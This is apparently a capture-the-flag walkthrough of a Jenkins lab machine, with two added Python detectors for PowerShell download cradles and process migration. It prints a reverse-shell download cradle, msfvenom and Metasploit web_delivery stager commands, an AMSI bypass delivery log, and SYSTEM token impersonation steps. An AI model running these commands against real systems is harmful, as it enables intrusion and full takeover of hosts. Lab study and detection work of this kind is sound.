In this room, we'll learn how to exploit a common misconfiguration on a widely used automation server (Jenkins, a tool used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they have made changes to it). After that, we'll use an interesting privilege escalation method to get full system access.
Since this is a Windows application, we'll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we'll be using the reverse shell scripts.
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
How many ports are open? (TCP only)
nmap -Pn -sV -O 10.10.205.78
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-24 12:43 GMT
Nmap scan report for ip-10-10-205-78.eu-west-1.compute.internal (10.10.205.78)
Host is up (0.0014s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
3389/tcp open tcpwrapped
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 02:8F:DD:66:F5:F9 (Unknown)
What is the username and password for the login panel? (in the format username:password)
Well... this is embarrassing... the default credentials work on this one: [REDACTED]:[REDACTED].
Now that we're in, we're going to poke around for a bit. The instructions for this task are as follows:
Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
You first need to download the PowerShell script and make it available for the server to download. You can do this by creating an HTTP server with Python:
python3 -m http.server
What I'm seeing is a project workspace that has a build in it. When we click on Build Executor Status, we have a script console we can use.
After testing some simple commands like whoami, I see we can use the second example there to run commands. We'll use the PowerShell command they offered us in the write-up.
This wasn't really working. I could see it downloading the file but not making the connection. I checked into the configure option under the project.
It looks like we can put a command in the build area too.
Then build the project.
I could see that the build failed but now I can click on the project and go into the console output and see where it's failing.
OK, so after a BUNCH of playing, it turns out the link that was provided for the shell script itself isn't good. I had to download the entire Nishang set and then use the PowerShell file that was in the raw download... silly. But that gave us the reverse shell pretty easily. We then just change directories to the user's desktop and grab the user.txt file.
Switching Shells: What is the final size of the exe payload that you generated?
This one's pretty straightforward: just follow the instructions, and the answer's right there when you make the executable.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.123.248 LPORT=1234 -f exe -o shell-name.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: [REDACTED] bytes
Saved as: shell-name.exe
The only thing I noticed was that doing the meterpreter shell should be done manually instead of doing it all on one line:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your-ip]
set LPORT [listening-port]
run
Also, when doing the service start, you might need to prefix it with the powershell command:
powershell Start-Process "shell-name.exe"
I couldn't get a connection back. It was frustrating. After what seemed like forever trying to find a suitable package to deploy, I came across this: https://www.offsec.com/metasploit-unleashed/web-delivery/ which talked about a meterpreter package called web delivery.
use exploit/multi/script/web_delivery
If you run options, you'll see everything we want to set; be sure to change the target to PowerShell (2), since that's what we have access to run.
set LHOST [your-ip]
set LPORT [listening-port]
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
When you run it, it will give you some code to run on the compromised box we're working on.
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.110.253:4444
msf6 exploit(multi/script/web_delivery) > [*] Using URL: http://10.10.110.253:8080/WAhJzdGE
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e [base64-encoded command omitted]
Once you copy and paste that code into the PC we're attempting to hack into, it will generate a connection back to us, and you'll see it waiting on a prompt for a while. I scrolled down and it brought me back to an msf prompt.
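The two ways this room launches PowerShell, the plain download cradle dropped into a Jenkins build step and the hidden, base64-encoded stager that web_delivery prints, leave the same fingerprints in a build's console output or in a Windows process-creation event. The following Python is an added detection example, not code from this write-up, from Jenkins or from Metasploit: it decodes the -e payload, matches both forms against a small indicator set and grades the result. The log records, the pattern set, the 192.0.2.x addresses and the 'stager' path are all constructed for the example.

```python
import base64
import re

# Added detection example (not part of the write-up). It scans command lines
# that a Jenkins build step or a Windows process-creation event would record,
# decodes PowerShell -e/-EncodedCommand payloads, and flags download cradles
# like the one used in this room. All sample records below are constructed.

CRADLE_PATTERNS = {
    # Fetch-and-run primitives seen in the plain-text cradle.
    "download_string": re.compile(r"DownloadString\s*\(", re.I),
    "webclient": re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.I),
    "iex": re.compile(r"(?:^|[\s;(])(?:iex|Invoke-Expression)\b", re.I),
    # Launch flags web_delivery used: no profile, hidden window, encoded command.
    "no_profile": re.compile(r"-no?p(?:rofile)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "encoded": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}


def decode_encoded_command(cmdline):
    """Return the script behind -e/-enc/-EncodedCommand, or None if there is none.

    PowerShell expects base64 of the UTF-16LE script, so that is what we undo.
    """
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not real base64 / not UTF-16: treat as undecodable


def analyse_command(cmdline):
    """Classify one command line: which indicators hit and how confident we are."""
    decoded = decode_encoded_command(cmdline)
    # Match against both the raw line and the decoded script, so an encoded
    # cradle is caught the same way a plain one is.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, pat in CRADLE_PATTERNS.items() if pat.search(text))
    if "download_string" in hits and "iex" in hits:
        verdict = "high"      # fetch + execute in one line: a download cradle
    elif "encoded" in hits or "hidden_window" in hits:
        verdict = "medium"    # stealthy launch flags, but no cradle visible
    elif hits:
        verdict = "low"
    else:
        verdict = "none"
    return {"hits": hits, "decoded": decoded, "verdict": verdict}


def encode_powershell(script):
    """Build the -e argument PowerShell expects; used here only to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed records: (where it was seen, command line). 192.0.2.0/24 is a
# documentation range standing in for the attacker host in the write-up.
SAMPLE_RECORDS = [
    ("jenkins console output", r"powershell -File C:\build\run_tests.ps1"),
    ("jenkins console output",
     "powershell iex (New-Object Net.WebClient).DownloadString("
     "'http://192.0.2.10:8000/Invoke-PowerShellTcp.ps1');"
     "Invoke-PowerShellTcp -Reverse -IPAddress 192.0.2.10 -Port 4444"),
    ("security 4688", "powershell.exe -nop -w hidden -e " + encode_powershell("Get-Date")),
    ("security 4688", "powershell.exe -nop -w hidden -e " + encode_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/stager')")),
]


def scan(records):
    """Run analyse_command over (source, command line) pairs, keeping their order."""
    return [{"source": src, "cmdline": cmd, **analyse_command(cmd)} for src, cmd in records]


if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(f"[{finding['verdict']:6}] {finding['source']}: {finding['hits']}")
        if finding["decoded"]:
            print(f"         decoded: {finding['decoded']}")
```

The same check can be run over a job's config.xml (the command text of a build step), over its console output, or over Security event 4688 / Sysmon event 1 command lines; the verdict thresholds are deliberately simple and meant to be tuned, and the point of decoding first is that an encoded cradle and a plain one then score identically.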
[*] 10.10.239.5 web_delivery - Delivering AMSI Bypass (1387 bytes)
[*] 10.10.239.5 web_delivery - Delivering Payload (3516 bytes)
[*] Sending stage (175686 bytes) to 10.10.239.5
[*] Meterpreter session 1 opened (10.10.110.253:4444 -> 10.10.239.5:49206) at 2023-11-27 13:08:51 +0000
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows alfred\bruce @ ALFRED 10.10.110.253:4444 -> 10.10.239.5:49206 (10.10.239.5)
msf6 exploit(multi/script/web_delivery) >
From there we can check our open sessions.
Type the number of the session you want access to, to get the meterpreter shell we've been looking for.
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter > dir
No entries exist in C:\Program Files (x86)\Jenkins\workspace\project
Now you'll notice that, unfortunately, you won't be able to run some commands with this shell; this is because we're using a shell that's basically a web shell.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
We'll need to move into something with higher privileges. If we run the ps command, we can see all the processes, their PIDs, and who owns each PID.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
< snip... >
2988 668 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
3008 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
3024 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3064 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
Then we migrate into that new PID with SYSTEM privileges.
migrate 3064
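Migrating into a SYSTEM-owned svchost.exe, as done here, means a process running as the Jenkins user opened a handle to a SYSTEM process with rights to write its memory and start a thread in it. Sysmon's ProcessAccess event (Event ID 10) records exactly that handle open, including the GrantedAccess mask. The Python below is an added example for the defensive side, not part of this write-up: it flags such cross-privilege handle opens over constructed Sysmon-style records. The field names follow Sysmon's ProcessAccess event, the SourceUser/TargetUser fields are assumed to be available (newer Sysmon builds or SIEM enrichment), and the source PIDs, image paths and the benign allowlist are invented for the example.

```python
# Added detection example (not from the write-up). Win32 process access
# rights from winnt.h; this combination is what cross-process code injection
# (and therefore a meterpreter migrate) needs on the target process handle.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

SYSTEM_ACCOUNT = "NT AUTHORITY\\SYSTEM"
# OS components that legitimately open SYSTEM processes with broad rights.
# Assumed starting point; a real deployment tunes this (EDR, backup agents).
BENIGN_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "lsass.exe"}

# Constructed Sysmon-style records as a SIEM would normalise them. Record 1
# mirrors the migrate above: the Jenkins user's powershell.exe opening the
# SYSTEM svchost.exe (PID 3064) with full access (0x1FFFFF).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceProcessId": 1520, "SourceUser": "ALFRED\\bruce",
     "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetProcessId": 3064, "TargetUser": SYSTEM_ACCOUNT,
     "TargetImage": "C:\\Windows\\System32\\svchost.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceProcessId": 356, "SourceUser": SYSTEM_ACCOUNT,
     "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetProcessId": 3064, "TargetUser": SYSTEM_ACCOUNT,
     "TargetImage": "C:\\Windows\\System32\\svchost.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceProcessId": 2100, "SourceUser": "ALFRED\\bruce",
     "SourceImage": "C:\\Windows\\System32\\taskmgr.exe",
     "TargetProcessId": 3024, "TargetUser": SYSTEM_ACCOUNT,
     "TargetImage": "C:\\Windows\\System32\\svchost.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceProcessId": 1520, "SourceUser": "ALFRED\\bruce",
     "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetProcessId": 2404, "TargetUser": "ALFRED\\bruce",
     "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "ProcessId": 1520, "User": "ALFRED\\bruce",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
]


def image_name(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def is_migration_candidate(ev):
    """True when a non-SYSTEM process opened a SYSTEM process with injection rights."""
    if ev.get("EventID") != 10:
        return False
    granted = int(ev["GrantedAccess"], 16)
    if (granted & INJECTION_MASK) != INJECTION_MASK:
        return False  # query/read-only handles (0x1400 etc.) are noise
    if ev["TargetUser"].upper() != SYSTEM_ACCOUNT:
        return False  # this rule only covers the user -> SYSTEM boundary
    if ev["SourceUser"].upper() == SYSTEM_ACCOUNT:
        return False  # SYSTEM touching SYSTEM is the OS's own business
    return image_name(ev["SourceImage"]) not in BENIGN_SOURCES


def find_migrations(events):
    """Filter a batch of events down to the candidate migrations, in order."""
    return [ev for ev in events if is_migration_candidate(ev)]


def describe(ev):
    """One-line analyst summary of a flagged event."""
    return (f"{ev['SourceUser']} {image_name(ev['SourceImage'])} (pid {ev['SourceProcessId']}) "
            f"opened {image_name(ev['TargetImage'])} (pid {ev['TargetProcessId']}) "
            f"running as {ev['TargetUser']} with {ev['GrantedAccess']}")


if __name__ == "__main__":
    for ev in find_migrations(SAMPLE_EVENTS):
        print("ALERT:", describe(ev))
```

Record 4 (powershell.exe opening another bruce-owned process with full access) is left unflagged on purpose: it is still worth a lower-severity rule, but it does not cross the privilege boundary this one is about. On a Jenkins host, the parent chain is the other strong signal: a build step runs under the service's java.exe, so a powershell.exe descended from it opening any SYSTEM process deserves a look even before the mask is checked.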
Now, when we run our command, we get the output without errors. We're able to answer another question as well:
What is the output when you run the getuid command?
meterpreter > impersonate_token "BUILTIN\Administrators"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
For the final question we simply browse to the file in question and use the 'cat' command to show the contents of the file.